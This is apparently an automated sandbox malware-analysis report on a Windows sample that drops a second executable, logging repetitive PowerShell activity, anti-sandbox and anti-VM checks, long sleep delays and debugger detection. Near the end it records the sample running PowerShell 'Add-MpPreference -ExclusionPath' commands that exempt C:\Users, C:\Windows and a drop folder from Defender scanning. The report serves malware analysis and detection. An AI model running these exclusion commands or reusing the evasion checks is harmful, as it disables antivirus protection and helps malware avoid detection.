Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Binary or memory string: DIR_WATCH.DLL
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Binary or memory string: SBIEDLL.DLL
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe | Binary or memory string: API_LOG.DLL
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.dr | Binary or memory string: EABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/%HS%S%SDELAYS.TMPWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION8
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Memory allocated: 2790000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Memory allocated: 29B0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Memory allocated: 2790000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Window / User API: threadDelayed 775
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Window / User API: threadDelayed 9067
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1068
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 458
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7498
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2182
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1553
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6815
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2907
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1346
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 615
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7908
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1753
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -29514790517935264s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -99812s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -99687s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -99578s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -99469s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -99359s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -99249s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -99140s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -99031s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -98922s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -98812s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -98703s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -98593s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -98484s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -98375s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -98265s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -98155s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -98047s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -97937s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -97828s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -97719s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -97609s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -97497s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -97390s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -97281s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -97172s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -97062s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -96953s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -96844s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -96719s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -96609s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -96500s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -96390s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -96281s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -96172s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -96062s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -95953s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -95844s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -95719s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -95609s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -95500s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -95390s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -95281s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -95172s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -95062s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -94953s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -94843s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -94734s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -94624s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 Thread sleep time: -94515s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5960 Thread sleep count: 1068 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3364 Thread sleep count: 42 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4832 Thread sleep count: 458 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2328 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6720 Thread sleep count: 7498 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7116 Thread sleep count: 2182 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3672 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5296 Thread sleep count: 1553 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5940 Thread sleep count: 265 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 828 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3500 Thread sleep count: 6815 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3836 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4820 Thread sleep count: 2907 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6012 Thread sleep count: 1346 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6012 Thread sleep count: 615 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4536 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2068 Thread sleep count: 7908 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2068 Thread sleep count: 1753 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5184 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0041E359 FindFirstFileA,FindFirstFileA,
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00420370 FindFirstFileA,FindFirstFileA,
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0042498B FindFirstFileA,FindFirstFileA,
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 100000
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 99812
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 99687
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 99578
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 99469
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 99359
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 99249
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 99140
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 99031
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 98922
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 98812
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 98703
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 98593
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 98484
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 98375
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 98265
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 98155
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 98047
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 97937
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 97828
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 97719
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 97609
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 97497
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 97390
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 97281
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 97172
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 97062
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 96953
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 96844
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 96719
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 96609
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 96500
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 96390
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 96281
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 96172
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 96062
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 95953
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 95844
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 95719
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 95609
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 95500
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 95390
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 95281
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 95172
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 95062
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 94953
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 94843
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 94734
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 94624
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Thread delayed: delay time: 94515
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: YYjRtxS70h.exe, 00000000.00000002.1785844596.0000000000C59000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmp Binary or memory string: VMwareVMware
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.00000000009CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP[
Source: YYjRtxS70h.exe, 00000000.00000002.1799387443.000000000657B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: YYjRtxS70h.exe, 00000000.00000002.1785844596.0000000000C06000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040168C mov eax, dword ptr fs:[00000030h]
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_004016AA test dword ptr fs:[00000030h], 00000068h
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_004016BB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\YYjRtxS70h.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\VmTatwGQo
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Process created: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe "C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe"
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Queries volume information: C:\Users\user\Desktop\YYjRtxS70h.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
